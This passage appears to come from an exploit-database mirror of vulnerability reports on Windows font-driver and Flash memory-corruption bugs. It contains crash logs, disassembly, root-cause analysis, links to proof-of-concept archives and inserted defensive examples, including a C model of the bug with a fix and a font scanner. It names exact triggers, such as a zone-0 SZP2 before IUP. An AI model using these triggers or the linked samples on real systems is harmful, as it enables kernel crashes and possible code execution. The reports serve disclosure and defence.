Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: eebd8451, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 9205440e, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 00000002, (reserved)
---

The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it should also be possible to observe a crash on a default Windows installation in ATMFD.DLL.

Note that this crash is very similar in its nature to Issue 383 (invalid memory access while traversing a linked list of "Adbe" structures); however, due to uncertainty about the reason for the crash and the different stack traces, I am filing this as a separate report for now.

Attached is an archive with six proof of concept font files (three for each crash location) together with corresponding kernel crash logs.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37921.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=385&can=1

We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as:

---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: a3a3a3db, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 91f445c9, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 00000002, (reserved)

Debugging Details:
------------------

*** ERROR: Module load completed but symbols could not be loaded for ATMFD.DLL

WRITE_ADDRESS:  a3a3a3db 

FAULTING_IP: 
ATMFD+345c9
91f445c9 83483810        or      dword ptr [eax+38h],10h

MM_INTERNAL_CODE:  2

IMAGE_NAME:  ATMFD.DLL

DEBUG_FLR_IMAGE_TIMESTAMP:  54e6a55a

MODULE_NAME: ATMFD

FAULTING_MODULE: 91f10000 ATMFD

DEFAULT_BUCKET_ID:  WIN7_DRIVER_FAULT

BUGCHECK_STR:  0x50

PROCESS_NAME:  csrss.exe

CURRENT_IRQL:  2

ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre

TRAP_FRAME:  879cfd8c -- (.trap 0xffffffff879cfd8c)
ErrCode = 00000002
eax=a3a3a3a3 ebx=00000008 ecx=00000004 edx=fb964900 esi=fb80e380 edi=fb80e3a0
eip=91f445c9 esp=879cfe00 ebp=879cfe10 iopl=0         nv up ei ng nz ac pe cy
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010297
ATMFD+0x345c9:
91f445c9 83483810        or      dword ptr [eax+38h],10h ds:0023:a3a3a3db=????????
Resetting default scope

LAST_CONTROL_TRANSFER:  from 826f4ce7 to 826902d8

STACK_TEXT:  
879cf8dc 826f4ce7 00000003 5e64199c 00000065 nt!RtlpBreakWithStatusInstruction
879cf92c 826f57e5 00000003 c06028e8 a3a3a3db nt!KiBugCheckDebugBreak+0x1c
879cfcf0 826a3391 00000050 a3a3a3db 00000001 nt!KeBugCheck2+0x68b
879cfd74 82655c48 00000001 a3a3a3db 00000000 nt!MmAccessFault+0x104
879cfd74 91f445c9 00000001 a3a3a3db 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
879cfe10 91f39eec fb964900 ff657038 91f563ec ATMFD+0x345c9
879cfe34 91f3e987 fb9bec70 91f563ec 00000f5c ATMFD+0x29eec
879d0544 91f3f6e0 fb9bec70 91f4f028 879d0790 ATMFD+0x2e987
879d0600 91f327ae fb9bec70 91f4f028 879d0790 ATMFD+0x2f6e0
879d06ec 91f32858 fb9bec70 879d0790 879d0814 ATMFD+0x227ae
879d0718 91f232b2 fb9bec70 91f4f028 879d0790 ATMFD+0x22858
879d087c 91f23689 ffffffff 879d099c fb874f58 ATMFD+0x132b2
879d08d0 91f1406d ffffffff 879d099c 00000000 ATMFD+0x13689
879d0924 91c7dcf2 ff7a5010 fbeeccf0 00000001 ATMFD+0x406d
879d096c 91c667cb ff7a5010 fbeeccf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
879d09e0 91c91513 ffa6a130 fb81e8d0 0000004f win32k!xInsertMetricsRFONTOBJ+0x9c
879d0a14 91c935f5 00000020 879d0b2c 879d0c92 win32k!RFONTOBJ::bGetGlyphMetrics+0x131
879d0cb8 91ca6684 040101b7 00000060 00000040 win32k!GreGetCharABCWidthsW+0x147
879d0d14 82652a66 040101b7 00000040 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
879d0d14 771870f4 040101b7 00000040 00000040 nt!KiSystemServicePostCall
0012f1d4 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---

The crash occurs while trying to modify memory under an invalid address. More specifically, the "a3a3a3a3" bytes found in the EAX register at the time of the crash are a repetition of a random byte filled by Driver Verifier in each pool allocation before returning it to the caller. This means that the dereferenced pointer is in fact an uninitialized value from the kernel pool.

The offending code (containing the crashing instruction) is as follows:

---
.text:000445C6 loc_445C6:
.text:000445C6                 mov     eax, [esi+ecx*4]
.text:000445C9                 or      dword ptr [eax+38h], 10h
.text:000445CD                 inc     ecx
.text:000445CE                 cmp     ecx, ebx
.text:000445D0                 jl      short loc_445C6
---

As shown above, there is a loop iterating EBX times over an array of addresses stored in [ESI]. At the time of the bugcheck, EBX=8, so the code expects 8 valid pointers in the array; however, only 4 pointers are properly initialized:

---
kd> dd fb80e380
fb80e380  fb964980 fb9649c0 fb964900 fb964940
fb80e390  a3a3a3a3 a3a3a3a3 a3a3a3a3 a3a3a3a3
fb80e3a0  a3a3a3a3 a3a3a3a3 a3a3a3a3 a3a3a3a3
---
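
As an added example (not ATMFD's code), the shape of the defect above and its checked counterpart in C. The structures are constructed to mirror the listing and the dump: a flags word at offset 0x38 (the `[eax+38h]` the loop ORs into), a pointer array with 8 allocated slots of which only 4 were populated, and 0xa3 bytes in the untouched slots standing in for Driver Verifier's fill pattern. The fix illustrated is to keep the "allocated" and "initialized" counts apart and to iterate over the latter; zero-initializing the array in addition turns a count mismatch into a detectable NULL rather than a wild pointer.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for the structure the loop patches: 'flags' sits at offset 0x38,
 * matching [eax+38h] in the listing (layout constructed for this demo). */
typedef struct {
    uint32_t header[14];
    uint32_t flags;
} font_item;

/* Stand-in for the object ESI points at: a pointer array plus the two counts
 * that the crashing code conflates. */
typedef struct {
    font_item **items;
    size_t capacity;   /* slots allocated (EBX=8 in the bugcheck) */
    size_t filled;     /* slots actually initialized (4 in the pool dump) */
} item_table;

/* The loop from the listing: trusts 'count' and follows every slot. Called with
 * count == capacity on a half-filled table it dereferences the 0xa3a3a3a3 fill. */
void mark_items_unchecked(font_item **items, size_t count)
{
    for (size_t i = 0; i < count; i++)
        items[i]->flags |= 0x10;
}

/* Hardened form: walk only initialized slots and refuse NULL entries. Returns
 * the number of items marked, or -1 if the table's counts are inconsistent. */
int mark_items_checked(const item_table *t)
{
    if (t->filled > t->capacity) return -1;
    for (size_t i = 0; i < t->filled; i++) {
        if (t->items[i] == NULL) return -1;
        t->items[i]->flags |= 0x10;
    }
    return (int)t->filled;
}

/* Builds a table shaped like the dump: 'capacity' slots, the first 'filled'
 * pointing at real items, the rest left as 0xa3 bytes (imitating Driver
 * Verifier's fill pattern) or zeroed when the caller asked for a clean array. */
item_table *make_table(size_t capacity, size_t filled, int verifier_fill)
{
    item_table *t = calloc(1, sizeof *t);
    t->items = malloc(capacity * sizeof *t->items);
    memset(t->items, verifier_fill ? 0xa3 : 0x00, capacity * sizeof *t->items);
    for (size_t i = 0; i < filled; i++)
        t->items[i] = calloc(1, sizeof(font_item));
    t->capacity = capacity;
    t->filled = filled;
    return t;
}

void free_table(item_table *t)
{
    for (size_t i = 0; i < t->filled; i++) free(t->items[i]);
    free(t->items);
    free(t);
}

/* Scenario 1: an 8-slot, 4-filled table. Returns how many slots still hold the
 * all-0xa3 fill, i.e. how many garbage pointers the unchecked loop would follow. */
size_t scenario_uninitialized_slots(void)
{
    item_table *t = make_table(8, 4, 1);
    uintptr_t pattern = 0;
    for (size_t k = 0; k < sizeof pattern; k++) pattern = (pattern << 8) | 0xa3;
    size_t n = 0;
    for (size_t i = 0; i < t->capacity; i++)
        if ((uintptr_t)t->items[i] == pattern) n++;
    free_table(t);
    return n;
}

/* Scenario 2: the checked walk on the same table marks exactly the 4 real items. */
int scenario_checked_walk(void)
{
    item_table *t = make_table(8, 4, 1);
    int marked = mark_items_checked(t);
    if (marked == 4 && t->items[3]->flags != 0x10) marked = -2;   /* flag really set? */
    free_table(t);
    return marked;
}

/* Scenario 3: zeroed array, but the caller claims all 8 slots are ready (the kind
 * of count mismatch behind the crash). The checked walk stops at the first NULL. */
int scenario_count_mismatch(void)
{
    item_table *t = make_table(8, 4, 0);
    t->filled = 8;
    int rc = mark_items_checked(t);
    t->filled = 4;                 /* restore so free_table releases only real items */
    free_table(t);
    return rc;
}

int main(void)
{
    printf("garbage slots in dump-shaped table: %zu\n", scenario_uninitialized_slots()); /* 4 */
    printf("checked walk marked: %d\n", scenario_checked_walk());                        /* 4 */
    printf("count mismatch rc: %d\n", scenario_count_mismatch());                        /* -1 */
    return 0;
}
```

`mark_items_unchecked` is only shown, never run on the half-filled table: with count set to the capacity it would follow the 0xa3a3a3a3 slots exactly as the bugcheck shows. The "checked" form is what a reviewer would ask for whenever a loop bound comes from a different field than the one that tracks how much of the array was written.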

The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it should also be possible to observe a crash on a default Windows installation in ATMFD.DLL.

Attached is an archive with two proof of concept font files together with corresponding kernel crash logs.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37920.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=368&can=1

We have encountered a number of Windows kernel crashes in the win32k!itrp_IUP function (a handler of the IUP[] TTF program instruction) while processing corrupted TTF font files, such as:

---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff6895b8, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 91f4a4f1, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 00000000, (reserved)

[...]

FAULTING_IP: 
win32k!itrp_IUP+2fb
91f4a4f1 8904b2          mov     dword ptr [edx+esi*4],eax

MM_INTERNAL_CODE:  0

DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT

BUGCHECK_STR:  0x50

PROCESS_NAME:  csrss.exe

CURRENT_IRQL:  0

LAST_CONTROL_TRANSFER:  from 91f4bc79 to 91f4a4f1

STACK_TEXT:  
8adcf3b8 91f4bc79 00000001 91f517d3 00000000 win32k!itrp_IUP+0x2fb
8adcf3c0 91f517d3 00000000 ff64eb28 00b61838 win32k!itrp_InnerExecute+0x38
8adcf3f8 91f4bc79 ff64eb28 91f4f088 ff64ebbc win32k!itrp_CALL+0x23b
8adcf400 91f4f088 ff64ebbc ff64eb84 ff64f95c win32k!itrp_InnerExecute+0x38
8adcf480 91f53234 00b61804 00b61838 ff64eb28 win32k!itrp_Execute+0x2b2
8adcf4a8 91f529dc 00b61804 00b61838 ff64eb28 win32k!itrp_ExecuteGlyphPgm+0x4a
8adcf4dc 91f51e5e ff64a570 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x102
8adcf574 91f5238c ff64a250 ff64b73c ff64eb28 win32k!fsg_ExecuteGlyph+0x1ce
8adcf5d0 91f52202 ff64a250 ff64eb28 ff64b6b4 win32k!fsg_CreateGlyphData+0xea
8adcf610 91f4f419 ff64a250 ff64eb28 ff64a2c4 win32k!fsg_GridFit+0x4d
8adcf688 91f5906c 00000001 8adcf6a4 91f58fc3 win32k!fs__Contour+0x287
8adcf694 91f58fc3 ff64a010 ff64a07c 8adcf6c0 win32k!fs_ContourGridFit+0x12
8adcf6a4 91f5991f ff64a010 ff64a07c 00000027 win32k!fs_NewContourGridFit+0x10
8adcf6c0 91f59960 fb8b0e78 00000027 8adcf6fc win32k!bGetGlyphOutline+0xd7
8adcf6e8 91f59b59 fb8b0e78 00000027 00000001 win32k!bGetGlyphMetrics+0x20
8adcf82c 91f4ec63 fb8b0e78 00000027 8adcf918 win32k!lGetGlyphBitmap+0x2b
8adcf850 91f4eab6 00000000 00000001 00000027 win32k!ttfdQueryFontData+0x158
8adcf8a0 91f4dce2 ff7af010 fba32cf0 00000001 win32k!ttfdSemQueryFontData+0x45
8adcf8e8 91f53774 ff7af010 fba32cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
8adcf960 91fcbc8d 8adcfc3c fb87ec00 ff6470cc win32k!xInsertMetricsPlusRFONTOBJ+0x120
8adcf990 91f4594d 0000000a ff7bf000 8adcfcd0 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
8adcf9c8 91fcb78b 8adcfc1c 8adcfc3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
8adcfa0c 91f455d0 8adcfcd0 0000000a 8adcfc1c win32k!ESTROBJ::vInit+0x268
8adcfc2c 91f45793 00000000 8adcfcd0 fba32cf0 win32k!GreGetTextExtentExW+0x12a
8adcfd0c 82657896 0801016f 02d90bac 0000000a win32k!NtGdiGetTextExtentExW+0x141
8adcfd0c 77b370f4 0801016f 02d90bac 0000000a nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0021f6c4 00000000 00000000 00000000 00000000 0x77b370f4
---

Depending on the malformed font file, the crashes occur at various locations in the win32k!itrp_IUP function, such as:

win32k!itrp_IUP+141: test    [esi+edx], cl
win32k!itrp_IUP+173: test    [eax+edx], cl
win32k!itrp_IUP+17b: mov     eax, [ecx+ebx*4]
win32k!itrp_IUP+184: mov     ecx, [ecx]
win32k!itrp_IUP+213: mov     eax, [ebx]
win32k!itrp_IUP+2c9: mov     eax, [eax+esi*4]
win32k!itrp_IUP+2fb: mov     [edx+esi*4], eax
win32k!itrp_IUP+317: add     [eax+esi*4], edx

This is caused by the fact that the function operates on (reads from and writes to) memory well beyond the dynamically allocated buffers, leading to a pool-based buffer overflow of controlled size and content and consequently allowing for remote code execution in the context of the Windows kernel.

It appears that the culprit of the vulnerability is the lack of handling of a corner case explicitly mentioned in the "The TrueType Instruction Set, Part 2" specification [1]:

"This instruction operates on points in the glyph zone pointed to by zp2. This zone should almost always be zone 1. Applying IUP to zone 0 is an error."

Every testcase we have examined contains an SZP2[] instruction ("Set Zone Pointer 2") with a 0 argument followed by the IUP[] instruction later on in the TTF program. The faulty instruction stream has the same outcome regardless of its location (i.e. font pre-program, glyph program etc.).

The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in the form of a crash in win32k!itrp_IUP or another location in kernel space, as caused by the corrupted pool state, depending on the specific testcase used.

Attached is an archive with eight sample files, each crashing at a different location in the win32k!itrp_IUP function on Windows 7 32-bit, together with corresponding kernel crash logs.
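A triage scanner for the pattern described above, an SZP2[] that receives 0 followed by IUP[] in any TrueType program, written here as an added example: it is not part of the original report and not code from Microsoft or Project Zero. It parses the sfnt table directory, the fpgm and prep tables and the instruction streams of simple glyphs, and decodes the push instructions so their inline data is not mistaken for opcodes; the opcode values are those of the TrueType instruction set, and the sample programs and one-glyph font are constructed inside the block.

```python
import struct

# TrueType opcodes used by the scanner (TrueType instruction set encoding).
OP_SZP2, OP_SZPS = 0x15, 0x16          # set zone pointer 2 / all three zone pointers
OP_NPUSHB, OP_NPUSHW = 0x40, 0x41      # push n bytes / n words, n given in the next byte
OP_IUP = (0x30, 0x31)                  # IUP[0] (y direction) and IUP[1] (x direction)
# PUSHB[0..7] = 0xB0..0xB7 pushes 1..8 inline bytes, PUSHW[0..7] = 0xB8..0xBF 1..8 inline words.


def decode(code):
    """Yield (offset, opcode, immediates), stepping over inline push data."""
    i, n = 0, len(code)
    while i < n:
        start, op = i, code[i]
        i += 1
        if op in (OP_NPUSHB, OP_NPUSHW):
            cnt, width = (code[i] if i < n else 0), (1 if op == OP_NPUSHB else 2)
            i += 1
        elif 0xB0 <= op <= 0xBF:
            cnt, width = (op & 7) + 1, (1 if op < 0xB8 else 2)
        else:
            yield start, op, []
            continue
        chunk = code[i:i + cnt * width]           # a short slice tolerates a truncated program
        i += cnt * width
        if width == 1:
            pushed = list(chunk)
        else:
            pushed = [struct.unpack(">h", chunk[j:j + 2])[0] for j in range(0, len(chunk) - 1, 2)]
        yield start, op, pushed


def scan_program(code, label="program"):
    """Flag each IUP[] reached after an SZP2[]/SZPS[] whose argument was a 0 pushed by the
    instruction right before it; any other or non-static argument clears the suspicion."""
    findings, zone0_at, last_pushed = [], None, []
    for off, op, pushed in decode(code):
        if op in (OP_SZP2, OP_SZPS):
            zone0_at = off if last_pushed and last_pushed[-1] == 0 else None
        elif op in OP_IUP and zone0_at is not None:
            findings.append("%s: SZP2 0 at +0x%x followed by IUP[] at +0x%x" % (label, zone0_at, off))
        last_pushed = pushed
    return findings


def table_directory(data):
    """Split an sfnt container into {tag: table bytes}."""
    (num_tables,) = struct.unpack(">H", data[4:6])
    tables = {}
    for k in range(num_tables):
        tag, _checksum, off, length = struct.unpack(">4sIII", data[12 + 16 * k:28 + 16 * k])
        tables[tag.decode("latin-1")] = data[off:off + length]
    return tables


def glyph_programs(tables):
    """Yield (glyph_id, instructions) for each simple glyph; composite glyphs are skipped."""
    try:
        head, loca, glyf = tables["head"], tables["loca"], tables["glyf"]
    except KeyError:
        return
    fmt, scale = (">I", 1) if struct.unpack(">h", head[50:52])[0] == 1 else (">H", 2)
    size = struct.calcsize(fmt)
    offsets = [scale * struct.unpack(fmt, loca[j:j + size])[0] for j in range(0, len(loca) - size + 1, size)]
    for gid in range(len(offsets) - 1):
        glyph = glyf[offsets[gid]:offsets[gid + 1]]
        n_contours = struct.unpack(">h", glyph[:2])[0] if len(glyph) >= 2 else -1
        p = 10 + 2 * n_contours                   # glyph header + endPtsOfContours[]
        if n_contours < 0 or p + 2 > len(glyph):
            continue                              # composite, empty or truncated glyph
        (ilen,) = struct.unpack(">H", glyph[p:p + 2])
        yield gid, glyph[p + 2:p + 2 + ilen]


def scan_font(data):
    """Scan fpgm, prep and every simple glyph program of a TrueType file."""
    tables = table_directory(data)
    findings = []
    for tag in ("fpgm", "prep"):
        findings += scan_program(tables.get(tag, b""), tag)
    for gid, prog in glyph_programs(tables):
        findings += scan_program(prog, "glyph %d" % gid)
    return findings


def build_sfnt(tables):
    """Assemble a minimal sfnt container (constructed test data, checksums left zero)."""
    n = len(tables)
    header = bytearray(struct.pack(">IHHHH", 0x00010000, n, 0, 0, 0))
    body, base = bytearray(), 12 + 16 * n
    for tag, blob in tables.items():
        header += struct.pack(">4sIII", tag.encode("latin-1"), 0, base + len(body), len(blob))
        body += blob + b"\0" * (-len(blob) % 4)
    return bytes(header + body)


# Constructed instruction streams: the pattern named in the report, and a benign one.
BAD_PROGRAM = bytes([0xB0, 0x00, 0x15, 0x30])        # PUSHB[0] 0; SZP2[]; IUP[0]
BENIGN_PROGRAM = bytes([0xB0, 0x01, 0x15, 0x31])     # PUSHB[0] 1; SZP2[]; IUP[1]
# Constructed one-glyph font: benign prep, BAD_PROGRAM inside glyph 0, short loca offsets.
_glyph0 = struct.pack(">hhhhhHH", 1, 0, 0, 0, 0, 0, len(BAD_PROGRAM)) + BAD_PROGRAM + b"\0\0"
SAMPLE_FONT = build_sfnt({"head": b"\0" * 50 + struct.pack(">hh", 0, 0),   # indexToLocFormat = 0 at offset 50
                          "loca": struct.pack(">HH", 0, len(_glyph0) // 2),
                          "glyf": _glyph0, "prep": BENIGN_PROGRAM})
```

Running `scan_font()` over a real file reports the table or glyph and the offsets of the offending SZP2[] and IUP[]; a zone pointer set from a computed stack value is deliberately not flagged, so an empty result is not proof of absence.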

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37919.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=370&can=1

We have encountered a number of Windows kernel crashes in the win32k!scl_ApplyTranslation function while processing corrupted TTF font files, such as:

---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff6c7000, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 94860935, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 00000000, (reserved)

[...]

FAULTING_IP: 
win32k!scl_ApplyTranslation+9b
94860935 011487          add     dword ptr [edi+eax*4],edx

MM_INTERNAL_CODE:  0

DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT

BUGCHECK_STR:  0x50

PROCESS_NAME:  csrss.exe

CURRENT_IRQL:  0

LAST_CONTROL_TRANSFER:  from 94862292 to 94860935

STACK_TEXT:  
8ad915ec 94862292 00000001 00000000 00000000 win32k!scl_ApplyTranslation+0x9b
8ad91610 9485f419 ff6ae250 ff6b24d8 ff6ae2c4 win32k!fsg_GridFit+0xdd
8ad91688 9486906c 00000001 8ad916a4 94868fc3 win32k!fs__Contour+0x287
8ad91694 94868fc3 ff6ae010 ff6ae07c 8ad916c0 win32k!fs_ContourGridFit+0x12
8ad916a4 9486991f ff6ae010 ff6ae07c 000000a4 win32k!fs_NewContourGridFit+0x10
8ad916c0 94869960 fc380e78 000000a4 8ad916fc win32k!bGetGlyphOutline+0xd7
8ad916e8 94869b59 fc380e78 000000a4 00000001 win32k!bGetGlyphMetrics+0x20
8ad9182c 9485ec63 fc380e78 000000a4 8ad91918 win32k!lGetGlyphBitmap+0x2b
8ad91850 9485eab6 00000000 00000001 000000a4 win32k!ttfdQueryFontData+0x158
8ad918a0 9485dce2 ff7af010 fbb4acf0 00000001 win32k!ttfdSemQueryFontData+0x45
8ad918e8 94863774 ff7af010 fbb4acf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
8ad91960 948dbc8d 8ad91c3c fba6cd68 ff6deca8 win32k!xInsertMetricsPlusRFONTOBJ+0x120
8ad91990 9485594d 0000000a ff7bf090 8ad91ce2 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
8ad919c8 948db78b 8ad91c1c 8ad91c3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
8ad91a0c 948555d0 8ad91cd0 0000000a 8ad91c1c win32k!ESTROBJ::vInit+0x268
8ad91c2c 94855793 00000000 8ad91cd0 fbb4acf0 win32k!GreGetTextExtentExW+0x12a
8ad91d0c 82645896 03010292 007c0bac 0000000a win32k!NtGdiGetTextExtentExW+0x141
8ad91d0c 772470f4 03010292 007c0bac 0000000a nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0021f9ac 00000000 00000000 00000000 00000000 0x772470f4
---

Depending on the malformed font file, the crashes are triggered at various locations in the win32k!scl_ApplyTranslation function:
win32k!scl_ApplyTranslation+43
win32k!scl_ApplyTranslation+9b

The crashes always occur while trying to access memory outside of a dynamically allocated destination buffer, leading to a pool-based buffer overflow, potentially allowing for remote code execution in the context of the Windows kernel. While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "maxp" and "hmtx" tables.

The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in win32k!scl_ApplyTranslation or another location in kernel space, as caused by the corrupted pool state, depending on the specific testcase used. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with three proof of concept font files together with corresponding kernel crash logs.

---------------------------------------------------------------------------------------------------------------------------------------------

While performing further analysis of some of the offending samples, we have found that sometimes buffers and structures in the pools align such that this condition causes an overwrite of function pointers residing in the font's fnt_GlobalGraphicStateType structure, consequently leading to crashes at invalid EIPs when one of these pointers is subsequently called. Several crashes such as the one shown below have been reproduced on Windows 7 32-bit with Special Pools enabled for win32k.sys:

---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: c1c00dc1, memory referenced.
Arg2: 00000008, value 0 = read operation, 1 = write operation.
Arg3: c1c00dc1, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 00000002, (reserved)

[...]

FAULTING_IP: 
+0
c1c00dc1 ??              ???

MM_INTERNAL_CODE:  2

DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT

BUGCHECK_STR:  0x50

PROCESS_NAME:  csrss.exe

CURRENT_IRQL:  0

LAST_CONTROL_TRANSFER:  from 9224a9cc to c1c00dc1

STACK_TEXT:  
WARNING: Frame IP not in any known module. Following frames may be wrong.
994574b4 9224a9cc 99457504 fb5a2efc fb5a2e94 0xc1c00dc1
994574c8 92244483 00000000 00000001 00000001 win32k!scl_CalcComponentOffset+0x21
99457538 92261ef8 00000800 fb5a2e94 fb5a2e94 win32k!fsg_MergeGlyphData+0x12a
99457574 9226238c fb5a2250 fb5a2f1c fb5a348c win32k!fsg_ExecuteGlyph+0x268
994575d0 92262202 fb5a2250 fb5a348c fb5a2ddc win32k!fsg_CreateGlyphData+0xea
99457610 9225f419 fb5a2250 fb5a348c fb5a22c4 win32k!fsg_GridFit+0x4d
99457688 9226906c 00000000 994576a4 92268fc3 win32k!fs__Contour+0x287
99457694 92268fc3 fb5a2010 fb5a207c 994576c0 win32k!fs_ContourGridFit+0x12
994576a4 9226991f fb5a2010 fb5a207c 00000080 win32k!fs_NewContourGridFit+0x10
994576c0 92269960 fbc5ee78 00000080 994576fc win32k!bGetGlyphOutline+0xd7
994576e8 92269b59 fbc5ee78 00000080 00000001 win32k!bGetGlyphMetrics+0x20
9945782c 9225ec63 fbc5ee78 00000080 99457918 win32k!lGetGlyphBitmap+0x2b
99457850 9225eab6 00000000 00000001 00000080 win32k!ttfdQueryFontData+0x158
994578a0 9225dce2 ff7af010 fe37ecf0 00000001 win32k!ttfdSemQueryFontData+0x45
994578e8 92263774 ff7af010 fe37ecf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
99457960 922dbc8d 99457c3c fbc2ebd8 ff6687fc win32k!xInsertMetricsPlusRFONTOBJ+0x120
99457990 9225594d 00000008 ff7bf040 99457cd8 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
994579c8 922db78b 99457c1c 99457c3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
99457a0c 922555d0 99457cd0 00000008 99457c1c win32k!ESTROBJ::vInit+0x268
99457c2c 92255793 00000000 99457cd0 fe37ecf0 win32k!GreGetTextExtentExW+0x12a
99457d0c 82646896 060102a1 00150bb0 00000008 win32k!NtGdiGetTextExtentExW+0x141
99457d0c 77a070f4 060102a1 00150bb0 00000008 nt!KiSystemServicePostCall
0028f27c 00000000 00000000 00000000 00000000 0x77a070f4
---

I am attaching another archive with a further 3 samples triggering crashes at invalid EIPs (as called by win32k!scl_CalcComponentOffset) on my test environment, together with corresponding crash logs.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37918.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=425&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

To reproduce, host the attached files appropriately and:

http://localhost/LoadMP4.swf?file=crash4000368.flv

If there is no crash at first, refresh the page a few times.

With a debugger attached to 64-bit Flash in Chrome Linux, the crash manifests like this:

=> 0x00007f7789d081bb <__memmove_ssse3_back+443>:	movaps %xmm1,-0x10(%rdi)

rdi            0x7f7778d69200

7f777894b000-7f7778d69000 rw-p 00000000 00:00 0 
7f7778d69000-7f7778d88000 ---p 00000000 00:00 0 

This looks very like a heap-based buffer overflow that just happens to have walked off the end of the committed heap.

Also, this bug bears disturbing similarities to CVE-2015-3043, see for example: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37879.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=404&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

Source file and compiled PoC attached.

Looking at https://github.com/adobe-flash/avmplus/blob/master/core/XMLListObject.cpp:

bool XMLListObject::delUintProperty(uint32_t index)
...
if (index >= _length())      [1]
        {
            return true;
        }
...
    px->childChanges(core->knodeRemoved, r->atom());  [2]
...
    m_children.removeAt(index);   [3]

In [1], the passed-in index is validated. In [2], the callback can run ActionScript, which might shrink the current XMLList. In [3], the pre-validated index is used, but it might now be invalid due to the shrinking at [2]. Unfortunately, removeAt() does not behave well in the presence of an out-of-bounds index.

The PoC works by triggering a wild copy in order to demonstrate the crash. But other side-effects are possible such as decrementing the refcount of an out-of-bounds index.
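The order of operations at [1] to [3] modelled in Python, as an added example that is not avmplus code: the vulnerable version carries the validated index across the change notification, the hardened version carries the element itself and locates it again afterwards. The class and helper names (XMLListModel, Node, script_that_shrinks) are constructed for the illustration; the exception stands in for what is memory corruption in the native code.

```python
class OutOfBoundsRemove(Exception):
    """Stands in for removeAt() misbehaving on an out-of-range index, which in the
    native code is memory corruption rather than an exception."""


class XMLListModel:
    """Minimal stand-in for XMLListObject: a child list plus a change notification
    that, like childChanges() in the engine, may run script that mutates the list."""

    def __init__(self, children, on_child_changes=None):
        self.m_children = list(children)
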